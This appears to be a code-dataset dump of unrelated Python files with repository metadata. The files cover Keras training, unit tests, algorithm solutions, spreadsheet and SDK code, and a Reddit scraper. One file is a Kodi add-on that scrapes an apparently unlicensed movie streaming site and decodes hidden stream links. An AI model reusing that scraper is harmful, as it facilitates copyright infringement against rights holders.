# ** Model Begins **
model = get_vgg16_for_mnist((dimension, dimension, 3), 10)
# model = self.get_model_simple()
train_datagen = ImageDataGenerator(
rescale=1. / 255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(
train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='categorical')
validation_generator = test_datagen.flow_from_directory(
validation_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='categorical')
model.fit_generator(
train_generator,
samples_per_epoch=train_generator.n,
nb_epoch=epoch,
validation_data=validation_generator,
nb_val_samples=validation_samples, workers=12)
# model.save_weights('mnistneuralnet.h5')
| [
"chris@fletch22.com"
] | chris@fletch22.com |
a4fd68b0396381878daf049a641dec0c58de016d | c5cb9d60da5bab94ccf4dfb28185315521cc2736 | /tests/fountain/test_program.py | 7edc24568ab6f69d4fee090c0a2202d98ada73c7 | [] | no_license | Let-it-Fountain/code-generator | 4aa93ed7688e064d727619f68c902823b5c99e4e | 25560af09d008d5501eb4f68e8db5bb2aeaa8461 | refs/heads/master | 2016-08-12T18:43:30.896931 | 2016-01-07T20:16:02 | 2016-01-07T20:38:42 | 49,221,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | import unittest
from fountain.command import ChangeNozzlePressureAndColorFountainCommand
from fountain.program import FountainProgram
class TestFountainProgram(unittest.TestCase):
def test_parse_json(self):
json = """{
"version": 1,
"commands": [
{
"nozzle": 1,
"pressure": 42,
"color": "green",
"time": 5
},
{
"nozzle": 2,
"pressure": 3.14,
"color": "red",
"time": 2
},
{
"nozzle": 5,
"pressure": 0,
"color": "yellow",
"time": 10
}
]
}"""
program = FountainProgram.parse_json(json)
self.assertListEqual([ChangeNozzlePressureAndColorFountainCommand(1, 42, 'green', 5),
ChangeNozzlePressureAndColorFountainCommand(2, 3.14, 'red', 2),
ChangeNozzlePressureAndColorFountainCommand(5, 0, 'yellow', 10)],
program.commands)
| [
"0coming.soon@gmail.com"
] | 0coming.soon@gmail.com |
016b7f14678ca082a128d9d26d7fe538516f88ca | 298c86756b741b4c0b706f5178fd26d6d3b63541 | /src/301_400/0330_patching-array/patching-array.py | 272322d30bc46a5f36cd0da0e961270b3653ad2b | [
"Apache-2.0"
] | permissive | himichael/LeetCode | c1bd6afd55479440c21906bf1a0b79a658bb662f | 4c19fa86b5fa91b1c76d2c6d19d1d2ef14bdff97 | refs/heads/master | 2023-02-12T07:25:22.693175 | 2023-01-28T10:41:31 | 2023-01-28T10:41:31 | 185,511,218 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | class Solution:
def minPatches(self, nums: List[int], n: int) -> int:
patches, x = 0, 1
length, index = len(nums), 0
while x <= n:
if index < length and nums[index] <= x:
x += nums[index]
index += 1
else:
x <<= 1
patches += 1
return patches
| [
"michaelwangg@qq.com"
] | michaelwangg@qq.com |
8235e8dcebb8c85c71c21f2c8a9467bf62a6ff4b | e5a511e346f5be8a82fe9cb2edf457aa7e82859c | /Python/ListPrograms/shuffleList.py | 87719058859c7a7cc65a26310471c5e2ace1e816 | [] | no_license | nekapoor7/Python-and-Django | 8397561c78e599abc8755887cbed39ebef8d27dc | 8fa4d15f4fa964634ad6a89bd4d8588aa045e24f | refs/heads/master | 2022-10-10T20:23:02.673600 | 2020-06-11T09:06:42 | 2020-06-11T09:06:42 | 257,163,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | """Write a Python program to shuffle and print a specified list. """
from random import shuffle
words = list(input().split())
shuffle(words)
print(words) | [
"neha.kapoor070789@gmail.com"
] | neha.kapoor070789@gmail.com |
35e12a74b76bdfabf580cd443df340d7e4f27584 | 565548ff49844ed69ae16d5104e500f01c973402 | /models/PST.py | 2592e69433fc0f5746b4d5cfa9e4f09e85a9eae1 | [] | no_license | jaisenbe58r/Pebrassos | 159ce5a8b372590fd9368d9b5b3c1b0513895bba | 7516a1f7bbba78547af86a9858ee381224964d28 | refs/heads/master | 2023-02-27T05:42:50.652697 | 2021-01-31T20:57:59 | 2021-01-31T20:57:59 | 299,698,630 | 3 | 1 | null | 2021-01-31T20:58:01 | 2020-09-29T18:04:36 | Jupyter Notebook | UTF-8 | Python | false | false | 1,169 | py | """Copyright (c) 2020 Jaime Sendra Berenguer & Carlos Mahiques Ballester
Pebrassos - Machine Learning Library Extensions
Author:Jaime Sendra Berenguer & Carlos Mahiques Ballester
<www.linkedin.com/in/jaisenbe>
License: MIT
"""
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from Helpers import utils
from Model import Embed, Checkpoint
EPOCHS=80
PASOS=7
# Carga de datos para el entrenamiento
scaler, training_data, target_data, valid_data, valid_target, continuas, valid_continuas = utils.load_data(PASOS)
# Modelo a utilizar
model = Embed.crear_modeloEmbeddings(PASOS)
#Entrenamiento
history = model.fit([training_data['weekday'],training_data['month'],continuas], target_data, epochs=EPOCHS,
validation_data=([valid_data['weekday'],valid_data['month'],valid_continuas],valid_target))
# Guardamos Checkpoint del modelo
Checkpoint.save_model(model, scaler)
# Predicción de resultados
results = model.predict([valid_data['weekday'],valid_data['month'],valid_continuas])
print( 'Resultados escalados',results )
inverted = scaler.inverse_transform(results)
print( 'Resultados',inverted ) | [
"jsendra@autis.es"
] | jsendra@autis.es |
8760723ee95d31f6a5cbdb418e9be59736b266df | 931ae36e876b474a5343d0608ef41da6b33f1048 | /062.py | 65898c09041b8f9ab2b9ef1e6e95318adaac13bd | [] | no_license | mucollabo/py100 | 07fc10164b1335ad45a55b6af4767948cf18ee28 | 6361398e61cb5b014d2996099c3acfe604ee457c | refs/heads/master | 2023-01-27T13:48:57.807514 | 2020-12-10T12:49:10 | 2020-12-10T12:49:10 | 267,203,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | import openpyxl
from openpyxl.styles import Alignment
import os
# 워크북(Workbook) 객체 만들기
wb = openpyxl.Workbook()
# 시트(Sheet) 객체 만들기
ws = wb.create_sheet(index=0, title='Merge')
wb.remove(wb['Sheet'])
# 데이터 입력하기
tuple_of_rows = ((1, 2),
(3, 4),
(5, 6),
(7, 8),
(9, 10),
)
for row in tuple_of_rows:
ws.append(row)
print(row)
ws.merge_cells(start_row=1, start_column=1, end_row=2, end_column=2)
A1 = ws.cell(row=1, column=1)
A1.value = 'Merged'
A1.alignment = Alignment(horizontal='center', vertical='center')
# 워크북의 변경내용을 새로운 파일에 저장
wb.save(os.path.join(os.getcwd(), 'output', 'create_workbook3.xlsx'))
| [
"mucollabo@gmail.com"
] | mucollabo@gmail.com |
cff20af9ca952b1c601ab44b87a8efd7effd6b35 | cff2b7c96ca0355a44116f6d18f026da69e412b0 | /script.module.Galaxy/lib/resources/lib/sources/en/Galaxy (31).py | 393be8d1d8c6c5e1d22fd97aa6d10bfc39403e53 | [
"Beerware"
] | permissive | krazware/therealufo | cc836e4e7049d277205bb590d75d172f5745cb7d | 4d6341c77e8c2cc9faec0f748a9a2d931b368217 | refs/heads/master | 2020-03-19T00:41:22.109154 | 2019-11-12T05:06:14 | 2019-11-12T05:06:14 | 135,496,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,918 | py | '''
The Martian Add-on
***FSPM was here*****
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re, urlparse, urllib, base64
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import cache
from resources.lib.modules import dom_parser2
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['solarmovie.net']
self.base_link = 'http://solarmovie.net'
self.search_link = '/search-movies/%s.html'
def movie(self, imdb, title, localtitle, aliases, year):
try:
clean_title = cleantitle.geturl(title)
search_url = urlparse.urljoin(self.base_link, self.search_link % clean_title.replace('-', '+'))
r = cache.get(client.request, 1, search_url)
r = client.parseDOM(r, 'div', {'id': 'movie-featured'})
r = [(client.parseDOM(i, 'a', ret='href'),
re.findall('.+?elease:\s*(\d{4})</', i),
re.findall('<b><i>(.+?)</i>', i)) for i in r]
r = [(i[0][0], i[1][0], i[2][0]) for i in r if
(cleantitle.get(i[2][0]) == cleantitle.get(title) and i[1][0] == year)]
url = r[0][0]
return url
except Exception:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
url = urlparse.parse_qs(url)
url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])
url['premiered'], url['season'], url['episode'] = premiered, season, episode
try:
clean_title = cleantitle.geturl(url['tvshowtitle'])+'-season-%d' % int(season)
search_url = urlparse.urljoin(self.base_link, self.search_link % clean_title.replace('-', '+'))
r = cache.get(client.request, 1, search_url)
r = client.parseDOM(r, 'div', {'id': 'movie-featured'})
r = [(client.parseDOM(i, 'a', ret='href'),
re.findall('<b><i>(.+?)</i>', i)) for i in r]
r = [(i[0][0], i[1][0]) for i in r if
cleantitle.get(i[1][0]) == cleantitle.get(clean_title)]
url = r[0][0]
except:
pass
data = client.request(url)
data = client.parseDOM(data, 'div', attrs={'id': 'details'})
data = zip(client.parseDOM(data, 'a'), client.parseDOM(data, 'a', ret='href'))
url = [(i[0], i[1]) for i in data if i[0] == str(int(episode))]
return url[0][1]
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
r = cache.get(client.request, 1, url)
try:
v = re.findall('document.write\(Base64.decode\("(.+?)"\)', r)[0]
b64 = base64.b64decode(v)
url = client.parseDOM(b64, 'iframe', ret='src')[0]
try:
host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({
'source': host,
'quality': 'SD',
'language': 'en',
'url': url.replace('\/', '/'),
'direct': False,
'debridonly': False
})
except:
pass
except:
pass
r = client.parseDOM(r, 'div', {'class': 'server_line'})
r = [(client.parseDOM(i, 'a', ret='href')[0], client.parseDOM(i, 'p', attrs={'class': 'server_servername'})[0]) for i in r]
if r:
for i in r:
try:
host = re.sub('Server|Link\s*\d+', '', i[1]).lower()
url = i[0]
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
if 'other'in host: continue
sources.append({
'source': host,
'quality': 'SD',
'language': 'en',
'url': url.replace('\/', '/'),
'direct': False,
'debridonly': False
})
except:
pass
return sources
except Exception:
return
def resolve(self, url):
if self.base_link in url:
url = client.request(url)
v = re.findall('document.write\(Base64.decode\("(.+?)"\)', url)[0]
b64 = base64.b64decode(v)
url = client.parseDOM(b64, 'iframe', ret='src')[0]
return url
| [
"krazinabox@gmail.com"
] | krazinabox@gmail.com |
084b701db876a7a9cc96de46ba22410822435bef | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_201/2768.py | 40e17f65e0ef41dbbc7a6fbe6147c990164a2ac2 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 958 | py | T = int(input())
for t in range(1, T + 1):
result = ""
N, K = [int(i) for i in input().split(" ")]
if N == K:
result = "{} {}".format(0, 0)
else:
s = [0 for i in range(N)]
for c in range(K):
Ls = [0 for i in range(N)]
Rs = [0 for i in range(N)]
for i in range(N):
if s[i] == 0:
try:
Ls[i] = s[i::-1].index(1) - 1
except ValueError:
Ls[i] = i
try:
Rs[i] = s[i+1:].index(1)
except ValueError:
Rs[i] = N - i - 1
mini = [min(Ls[i], Rs[i]) if s[i] == 0 else -1 for i in range(N)]
minimum = max(mini)
minIndex = [i for i in range(N) if mini[i] == minimum]
maxi = [max(Ls[i], Rs[i]) if i in minIndex else -1 for i in range(N)]
maxIndex = maxi.index(max(maxi))
maximum = max(maxi)
if len(minIndex) == 1:
s[minIndex[0]] = 1
else:
s[maxIndex] = 1
result = "{} {}".format(maximum, minimum)
print("Case #{}: {}".format(t, result)) | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
c92647660bee53af23986221cb7ab6c32ab5ce7f | 8a3d282ffb9830b01a3b698e2930ba8da6617d99 | /Lesson4/exercise1.py | 325205e8b230c4e4ebd0d2c7fbf211e9164ab04a | [] | no_license | papri-entropy/pynet-py3 | 08ba96adc9e0163990c7a8064ed8207b898748ff | 5554fa8a61b2e57f652046815e60f1b6db361d1e | refs/heads/master | 2023-04-03T17:51:45.105739 | 2021-04-15T14:33:05 | 2021-04-15T14:33:05 | 344,288,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | #!/usr/bin/env python
"""
1. Create a dictionary representing a network device. The dictionary should have key-value pairs representing the 'ip_addr', 'vendor', 'username', and 'password' fields.
Print out the 'ip_addr' key from the dictionary.
If the 'vendor' key is 'cisco', then set the 'platform' to 'ios'. If the 'vendor' key is 'juniper', then set the 'platform' to 'junos'.
Create a second dictionary named 'bgp_fields'. The 'bgp_fields' dictionary should have a keys for 'bgp_as', 'peer_as', and 'peer_ip'.
Using the .update() method add all of the 'bgp_fields' dictionary key-value pairs to the network device dictionary.
Using a for-loop, iterate over the dictionary and print out all of the dictionary keys.
Using a single for-loop, iterate over the dictionary and print out all of the dictionary keys and values.
"""
from pprint import pprint
device = {
'ip_addr': '4.4.4.4',
'vendor': 'cisco',
'username': 'admin',
'password': 'secret'
}
print("*" * 80)
print(device['ip_addr'])
print("*" * 80)
if device['vendor'].lower() == 'cisco':
device['platform'] = 'ios'
elif device['vendor'].lower() == 'juniper':
device['platform'] = 'junos'
print("*" * 80)
print(device['platform'])
print("*" * 80)
bgp_fields = {
'bgp_as': 65000,
'peer_as': 65001,
'peer_ip': "1.1.1.2"
}
device.update(bgp_fields)
for key in device.keys():
print(key)
print("*" * 80)
for key, value in device.items():
print(f"{key:>15} ---> {value:>15}") | [
"cosminpetrache4@gmail.com"
] | cosminpetrache4@gmail.com |
986648f850c2baa86b81a830fe9aa86b1cb75ddc | ff60a647a3cc566220f5cefc8ddec7e1f865ac20 | /0x13-count_it/2-recurse.py | 01d85f2ffb597b45e64d288db5d85c4b052c9f42 | [] | no_license | mag389/holbertonschool-interview | cf6c2cc568bc321dcd705fbb76ad1e13ff8ba4f7 | 6f5b621d7a03efb990970e8c28ac41c1498aa6cd | refs/heads/main | 2023-07-19T05:57:50.296276 | 2021-09-09T14:34:02 | 2021-09-09T14:34:02 | 319,713,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | #!/usr/bin/python3
""" script to scrape and count words from reddit hot posts
"""
import requests
import time
import urllib
import sys
def recurse(subreddit, hot_list=[], after=""):
""" uses reddit api to give top 10 hot posts
in a subreddit
"""
custom_user = {"User-Agent": "custom"}
url = "https://www.reddit.com/r/" + subreddit + "/hot.json"
print(url)
if after == "":
params = {'limit': 1, 'count': 1}
else:
params = {'limit': 1, 'count': 1, 'after': after}
params = {'after': after}
# print("right before request")
res = requests.get(url,
headers=custom_user, params=params,
allow_redirects=False)
# print(res.status_code)
if res.status_code != 200:
return(None)
else:
info = res.json()
# print(info)
children = info.get('data').get('children')
if children is None or len(children) == 0:
return (hot_list)
for child in children:
hot_list.append(child.get('data').get("title"))
# child = children[len(children) - 1]
# title = child.get('data').get("title")
# print(title)
# hot_list.append(child.get('data').get("title"))
after = info.get('data').get('after')
print(after)
if after == 'null' or after is None:
return (hot_list)
return (recurse(subreddit, hot_list, after))
| [
"mag389@cornell.edu"
] | mag389@cornell.edu |
2abce665437b0f3f3ab17d70c43c98a0c6ebc291 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayInsSceneFamilydoctorItemBatchqueryModel.py | 4a78f51f516c09e2559b61451709e855a8a875f6 | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 3,638 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayInsSceneFamilydoctorItemBatchqueryModel(object):
def __init__(self):
self._ant_ser_contract_no = None
self._disease_name_list = None
self._emergency = None
self._general_name_list = None
@property
def ant_ser_contract_no(self):
return self._ant_ser_contract_no
@ant_ser_contract_no.setter
def ant_ser_contract_no(self, value):
self._ant_ser_contract_no = value
@property
def disease_name_list(self):
return self._disease_name_list
@disease_name_list.setter
def disease_name_list(self, value):
if isinstance(value, list):
self._disease_name_list = list()
for i in value:
self._disease_name_list.append(i)
@property
def emergency(self):
return self._emergency
@emergency.setter
def emergency(self, value):
self._emergency = value
@property
def general_name_list(self):
return self._general_name_list
@general_name_list.setter
def general_name_list(self, value):
if isinstance(value, list):
self._general_name_list = list()
for i in value:
self._general_name_list.append(i)
def to_alipay_dict(self):
params = dict()
if self.ant_ser_contract_no:
if hasattr(self.ant_ser_contract_no, 'to_alipay_dict'):
params['ant_ser_contract_no'] = self.ant_ser_contract_no.to_alipay_dict()
else:
params['ant_ser_contract_no'] = self.ant_ser_contract_no
if self.disease_name_list:
if isinstance(self.disease_name_list, list):
for i in range(0, len(self.disease_name_list)):
element = self.disease_name_list[i]
if hasattr(element, 'to_alipay_dict'):
self.disease_name_list[i] = element.to_alipay_dict()
if hasattr(self.disease_name_list, 'to_alipay_dict'):
params['disease_name_list'] = self.disease_name_list.to_alipay_dict()
else:
params['disease_name_list'] = self.disease_name_list
if self.emergency:
if hasattr(self.emergency, 'to_alipay_dict'):
params['emergency'] = self.emergency.to_alipay_dict()
else:
params['emergency'] = self.emergency
if self.general_name_list:
if isinstance(self.general_name_list, list):
for i in range(0, len(self.general_name_list)):
element = self.general_name_list[i]
if hasattr(element, 'to_alipay_dict'):
self.general_name_list[i] = element.to_alipay_dict()
if hasattr(self.general_name_list, 'to_alipay_dict'):
params['general_name_list'] = self.general_name_list.to_alipay_dict()
else:
params['general_name_list'] = self.general_name_list
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayInsSceneFamilydoctorItemBatchqueryModel()
if 'ant_ser_contract_no' in d:
o.ant_ser_contract_no = d['ant_ser_contract_no']
if 'disease_name_list' in d:
o.disease_name_list = d['disease_name_list']
if 'emergency' in d:
o.emergency = d['emergency']
if 'general_name_list' in d:
o.general_name_list = d['general_name_list']
return o
| [
"jishupei.jsp@alibaba-inc.com"
] | jishupei.jsp@alibaba-inc.com |
de6378f101239d52c399e53d1291b84af868b941 | f305f84ea6f721c2391300f0a60e21d2ce14f2a5 | /22_专题/implicit_graph/RangeFinder/Finder-fastset.py | ce22f608c5a5bd551f47efa704b5fe7821690be3 | [] | no_license | 981377660LMT/algorithm-study | f2ada3e6959338ae1bc21934a84f7314a8ecff82 | 7e79e26bb8f641868561b186e34c1127ed63c9e0 | refs/heads/master | 2023-09-01T18:26:16.525579 | 2023-09-01T12:21:58 | 2023-09-01T12:21:58 | 385,861,235 | 225 | 24 | null | null | null | null | UTF-8 | Python | false | false | 3,937 | py | # 寻找前驱后继/区间删除
from typing import Optional
class Finder:
"""利用位运算寻找区间的某个位置左侧/右侧第一个未被访问过的位置.
初始时,所有位置都未被访问过.
"""
__slots__ = "_n", "_lg", "_seg"
@staticmethod
def _trailingZeros1024(x: int) -> int:
if x == 0:
return 1024
return (x & -x).bit_length() - 1
def __init__(self, n: int) -> None:
self._n = n
seg = []
while True:
seg.append([0] * ((n + 1023) >> 10))
n = (n + 1023) >> 10
if n <= 1:
break
self._seg = seg
self._lg = len(seg)
for i in range(self._n):
self.insert(i)
def insert(self, i: int) -> None:
for h in range(self._lg):
self._seg[h][i >> 10] |= 1 << (i & 1023)
i >>= 10
def erase(self, i: int) -> None:
for h in range(self._lg):
self._seg[h][i >> 10] &= ~(1 << (i & 1023))
if self._seg[h][i >> 10]:
break
i >>= 10
def next(self, i: int) -> Optional[int]:
"""返回x右侧第一个未被访问过的位置(包含x).
如果不存在,返回None.
"""
if i < 0:
i = 0
if i >= self._n:
return
seg = self._seg
for h in range(self._lg):
if i >> 10 == len(seg[h]):
break
d = seg[h][i >> 10] >> (i & 1023)
if d == 0:
i = (i >> 10) + 1
continue
i += self._trailingZeros1024(d)
for g in range(h - 1, -1, -1):
i <<= 10
i += self._trailingZeros1024(seg[g][i >> 10])
return i
def prev(self, i: int) -> Optional[int]:
"""返回x左侧第一个未被访问过的位置(包含x).
如果不存在,返回None.
"""
if i < 0:
return
if i >= self._n:
i = self._n - 1
seg = self._seg
for h in range(self._lg):
if i == -1:
break
d = seg[h][i >> 10] << (1023 - (i & 1023)) & ((1 << 1024) - 1)
if d == 0:
i = (i >> 10) - 1
continue
i += d.bit_length() - 1024
for g in range(h - 1, -1, -1):
i <<= 10
i += (seg[g][i >> 10]).bit_length() - 1
return i
def islice(self, begin: int, end: int):
"""遍历[start,end)区间内的元素."""
x = begin - 1
while True:
x = self.next(x + 1)
if x is None or x >= end:
break
yield x
def __contains__(self, i: int) -> bool:
return not not self._seg[0][i >> 10] & (1 << (i & 1023))
def __iter__(self):
yield from self.islice(0, self._n)
def __repr__(self):
return f"FastSet({list(self)})"
if __name__ == "__main__":
...
# 前驱后继
def pre(pos: int):
return next((i for i in range(pos, -1, -1) if ok[i]), None)
def nxt(pos: int):
return next((i for i in range(pos, n) if ok[i]), None)
def erase(left: int, right: int):
for i in range(left, right):
ok[i] = False
from random import randint
for _ in range(100):
n = randint(1, 100)
F = Finder(n)
for i in range(n):
F.insert(i)
ok = [True] * n
for _ in range(100):
e = randint(0, n - 1)
F.erase(e)
erase(e, e + 1)
for i in range(n):
assert F.prev(i) == pre(i), (i, F.prev(i), pre(i))
assert F.next(i) == nxt(i), (i, F.next(i), nxt(i))
print("Done!")
| [
"lmt2818088@gmail.com"
] | lmt2818088@gmail.com |
1ef40b11592352d2630e7e1c9536c6dc9c1fa5ee | 2463da77ab902e3728a71fc0a09fb92f687e755d | /contentful_proxy/handlers/files.py | ac9a51f1a693722ac68d98e5b4cf05a01ac3cd13 | [
"MIT"
] | permissive | stanwood/gae-contentful-proxy | 5c2f0aa41819483aa8e428134cc94d4f26c90141 | 739a8b370eb714e27a9f2b50e3772701f52f81df | refs/heads/master | 2020-03-24T20:41:06.798623 | 2019-02-28T10:22:46 | 2019-02-28T10:22:46 | 142,991,557 | 2 | 0 | MIT | 2019-02-28T10:22:47 | 2018-07-31T09:19:16 | Python | UTF-8 | Python | false | false | 4,576 | py | # The MIT License (MIT)
#
# Copyright (c) 2018 stanwood GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import os
import webapp2
from google.appengine.api import memcache
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from contentful_proxy.models import files
from contentful_proxy.utils.handlers import storage
from contentful_proxy.utils.handlers import webapp2_base
class CacheHandler(webapp2_base.CustomBaseHandler, storage.CloudClient):
"""Handler which saves a file and returns the file from Google Cloud Storage or from memcache."""
@webapp2.cached_property
def memcache_key(self):
return self.request.path_qs
@webapp2.cached_property
def folder(self):
return self.request.route_kwargs['source_host']
@webapp2.cached_property
def contentful_url(self):
return 'https://{}'.format(self.request.route_kwargs['source_host'])
@webapp2.cached_property
def file_path(self):
return self.request.route_kwargs.get('file_path')
@webapp2.cached_property
def file_path_with_parameters(self):
if self.request.query_string:
file_path_with_parameters = u'{}?{}'.format(self.file_path, self.request.query_string)
else:
file_path_with_parameters = self.file_path
return file_path_with_parameters
@webapp2.cached_property
def file_url(self):
return '{}/{}'.format(self.contentful_url, self.file_path_with_parameters)
def dispatch(self):
"""
Dispatches the request.
If file url is stored in memcache the dispatcher redirects to the memcached file, otherwise it
runs method and set new url to cache.
"""
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['Cache-Control'] = 'no-cache'
redirect_url = memcache.get(self.memcache_key)
if redirect_url:
self.redirect(redirect_url, code=303)
else:
super(CacheHandler, self).dispatch()
memcache.set(
self.memcache_key,
self.response.headers['location']
)
def get(self, *args, **kwargs):
"""
Returns file by it's file path.
When file is called first time, file is saved in Google Cloud Storage and its details are saved
in Google Datastore (ndb).
Otherwise, file details are taken from Google Datastore and File is returned from Google Cloud Storage.
Usage:
curl -X GET "https://{domain}.appspot.com/contentful/file_cache/{source_host}/{file_path}
"""
_, file_name = os.path.split(self.file_path)
contentful_file = ndb.Key(files.ContentfulFile, self.file_url).get()
if contentful_file is None:
logging.debug("Image not cached")
response = urlfetch.fetch(self.file_url, deadline=60)
blob = self.store(
file_name=self.file_path_with_parameters + u'/' + file_name,
file_data=response.content,
content_type=response.headers.get('content-type', 'application/octet-stream')
)
blob.make_public()
contentful_file = files.ContentfulFile(
id=self.file_url,
public_url=blob.public_url,
name=blob.name,
memcache_key=self.memcache_key
)
contentful_file.put()
self.redirect(contentful_file.public_url.encode('utf-8'), code=303)
| [
"rivinek@gmail.com"
] | rivinek@gmail.com |
f35a141a6b9327cb830d2aa9efce7a27e0ecb22c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02797/s548875738.py | 1e4c657afd00f60237371da34c8f737408e516b4 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py | N,K,S=map(int,input().split())
ans=[]
if S<10**9:
ans=[S for i in range(K)]
ans+=[S+1 for i in range(N-K)]
else:
ans=[S for i in range(K)]
ans+=[1 for i in range(N-K)]
print(*ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
4d27f8a2e3a7a4c655602b958bdd5755afb6049f | ad13583673551857615498b9605d9dcab63bb2c3 | /output/models/nist_data/list_pkg/unsigned_int/schema_instance/nistschema_sv_iv_list_unsigned_int_enumeration_5_xsd/__init__.py | aac688dac1eef59628983e92d248aa85f031d7b3 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 395 | py | from output.models.nist_data.list_pkg.unsigned_int.schema_instance.nistschema_sv_iv_list_unsigned_int_enumeration_5_xsd.nistschema_sv_iv_list_unsigned_int_enumeration_5 import (
NistschemaSvIvListUnsignedIntEnumeration5,
NistschemaSvIvListUnsignedIntEnumeration5Type,
)
__all__ = [
"NistschemaSvIvListUnsignedIntEnumeration5",
"NistschemaSvIvListUnsignedIntEnumeration5Type",
]
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
ebba29e91a30057168a0cd0f69ce39d84363309c | aa9e472929a1f3f87bbcd5cc272be99a68bf047a | /tuples/find_repeated_items.py | f5ead828d7bb5bb8c756c383020eb510d31fe6c4 | [] | no_license | stradtkt/Python-Exercises | 226706542f88973f77e6f2870b21cd87a278bf2b | 18353443b146ce6e8345fcf618d07de2bae6eb86 | refs/heads/master | 2020-03-19T16:09:51.006809 | 2018-06-30T20:28:34 | 2018-06-30T20:28:34 | 136,703,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | my_tuple = 2,4,6,2,4,6,5,2,4,6,7
count1 = my_tuple.count(2)
count2 = my_tuple.count(4)
count3 = my_tuple.count(6)
print(count1)
print(count2)
print(count3) | [
"stradtkt22@gmail.com"
] | stradtkt22@gmail.com |
